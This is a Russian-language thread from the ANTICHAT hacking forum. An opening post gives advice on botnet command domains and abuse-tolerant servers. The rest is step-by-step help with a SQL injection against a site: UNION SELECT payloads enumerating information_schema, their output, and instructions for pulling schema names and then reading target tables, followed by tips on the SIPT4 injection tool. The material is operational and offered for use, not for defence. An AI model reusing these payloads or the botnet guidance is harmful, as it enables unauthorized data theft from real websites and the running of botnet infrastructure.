ANTICHAT — форум по информационной безопасности, OSINT и технологиям

эм.. ну что сказать, сразу напрашивается вопрос - тебе это надо ?
по сабжу: боты же должны куданить отстукивать? или к ним снизойдёт озарение и они сами придумают чтобы такого сделать ..
так вот, какая им разница куда стучать??
--
и вообще, нах домен абузный, ты ж не спамить домен собрался ..
ну допустим на связку один домен/ip, а на ботнет уже стоит другой .. хотя на одном тож никто не мешает делать .. но энто лишнее паливо всёже .. хотя на абузном серваке пох ваще.

хелп.
нашёл скулю
http://site.ru/index.php?id_page=216&id_news=36+union+select+1,2, 3,concat(table_name,0x3a,column_name),5+from+infor mation_schema.columns
вывело кучу всего

TRIGGERS:CREATED
TRIGGERS:SQL_MODE
TRIGGERSEFINER
USER_PRIVILEGES:GRANTEE
USER_PRIVILEGES:TABLE_CATALOG
USER_PRIVILEGES:PRIVILEGE_TYPE
USER_PRIVILEGES:IS_GRANTABLE
VIEWS:TABLE_CATALOG

(часть списка)

Но читать их не получается, всегда ошибка Table doesn't exist
Можно что-нибудь сделать?

посмотри бд в которой они хранятся
select table_schema from information_schema.columns where table_name='name'
или сразу так выводи
select+1,2,3,concat(table_schema,0x3a,table_name,0 x3a,column_name),5+from+information_schema.columns

потом ....+from+dbname.table_name

вывелось так

information_schema:TRIGGERS:CREATED
information_schema:TRIGGERS:SQL_MODE
information_schema:TRIGGERSEFINER
information_schema:USER_PRIVILEGES:GRANTEE
information_schema:USER_PRIVILEGES:TABLE_CATALOG
information_schema:USER_PRIVILEGES:PRIVILEGE_TYPE
information_schema:USER_PRIVILEGES:IS_GRANTABLE

ну выводи теперь то что тебе нужно, в чем проблемма?

У меня пара вопросов по программе SIPT4:
1.Почему в некоторых случаях программа может определить принтабельные поля в инъекции, в других нет? При том что инъекции все простые и одинаковые.
2.Что означает каждая из цифр в поле "принтабельные поля": {2},4,5. Я так понимаю, 4 и 5 - это номер поля, а что означает цифра в фигурных скобках? Но это точно не число принтабельных полей.

Был бы признателен еще если бы кто-нибудь дал линк на подробный мануал по проге (а лучше видео).

в {} принтабельное поле из найденных (мог бы и сам догадаться)

офф. сайт проги - http://dbattack.com/

Любая авто-тулза работает только в так называемых ИДЕАЛЬНЫХ условиях sql-inj, поэтому предпочтительно всё делать ручками, по крайней мере на начальном этапе.

да нет, по-моему... к примеру, есть {2},4,5 - так вот как раз 4 и 5 это принтабельные поля.. ну во всяком случае у меня всегда это были принтабельные поля.. хз, может совпадало так.
http://dbattack.com/ - уже черт знает сколько не работает.

Pashkela правильно сказал, просто ты его недопонял.

{2},4,5 - принтабельные, а конкретно через 2-ое поле, прога будет выводить.